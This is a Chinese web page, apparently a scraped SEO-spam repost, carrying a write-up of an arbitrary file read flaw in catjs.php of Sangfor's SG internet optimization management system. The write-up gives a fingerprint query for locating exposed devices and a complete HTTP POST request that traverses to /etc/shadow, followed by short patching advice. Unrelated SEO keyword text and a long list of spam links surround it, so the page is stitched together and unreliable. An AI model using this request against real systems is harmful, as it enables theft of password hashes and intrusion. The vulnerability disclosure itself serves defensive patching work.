当前位置: 首页 > news >正文

郑州企业网站优化公司seo准

郑州企业网站优化公司,seo准,邢台移动网站设计,手机app网站开发深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞 一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现小龙POC检测: 五、 修复建议 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间…

深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞

  • 一、漏洞描述
  • 二、漏洞影响
  • 三、网络测绘
  • 四、漏洞复现
    • 小龙POC检测:
  • 五、 修复建议

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件

二、漏洞影响

深信服 SG上网优化管理系统

三、网络测绘

title==“SANGFOR上网优化管理”

四、漏洞复现

登陆页面

在这里插入图片描述
验证POC

POST /php/catjs.php["../../../../../../etc/shadow"]

burp发包验证:

POST /php/catjs.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Content-Length: 32["../../../../../../etc/shadow"]

在这里插入图片描述

小龙POC检测:

说明一下,由于监管强制要求,POC要等护网后才能开放

小龙POC传送门: 小龙POC工具

在这里插入图片描述

五、 修复建议

关闭互联网访问权限,将该接口设置权限认证(仅允许内部访问)
尽快打补丁!

http://www.shuangfujiaoyu.com/news/63584.html

相关文章:

  • ps临摹网站北京seo公司有哪些
  • 做喜报的网站baidu百度网盘
  • wordpress安装ssl后网站404百度极速版免费下载安装
  • 网站制作镇江百度pc端网页版
  • ux主题wordpress手机系统优化软件哪个好
  • 网站建设综合实训心得体会优秀营销软文100篇
  • 好的网站建设价格nba新闻最新消息
  • 苏州园区两学一做网站seo引擎优化培训
  • 宁波网站建设佳选蓉胜网络好云浮网站设计
  • 东莞网站建设_东莞网页设计百度近日收录查询
  • 最近新闻热点大事件优化游戏性能的软件
  • 禅城网站建设seo优化上首页
  • 简述网站建设基本流程图河南省干部任免最新公示
  • 国家 政府网站建设 指导性文件有哪些企业网站建设的基本流程
  • 网站建设 可行性河南省干部任免最新公示
  • 山东住房建设部官方网站台州网站建设方案推广
  • 3d做号网站做网站公司哪家正规
  • 网站日志太大怎么分析网络推广策划方案怎么写
  • 品牌网站建设公司百度官方网站首页
  • 油金地 做网站网络营销策划模板
  • 京东网站建设项目需求分析报告原创文章代写平台
  • 自由策划网站建设信息推广平台有哪些
  • 小程序网站开发运行合同网站排名优化课程
  • 深圳阿里网站设计公司阿里指数官网最新版本
  • 网站建设采用thinkphp框架的优势郑州网站建设哪家好
  • 帮人做网站推选的公司免费做网站自助建站
  • 电脑做微信推送的网站整合营销推广
  • 怎么自己做网站模板互联网营销推广
  • 全国住房和城乡建设厅证书查询网南宁百度seo软件
  • 安徽网络推广新手seo博客写作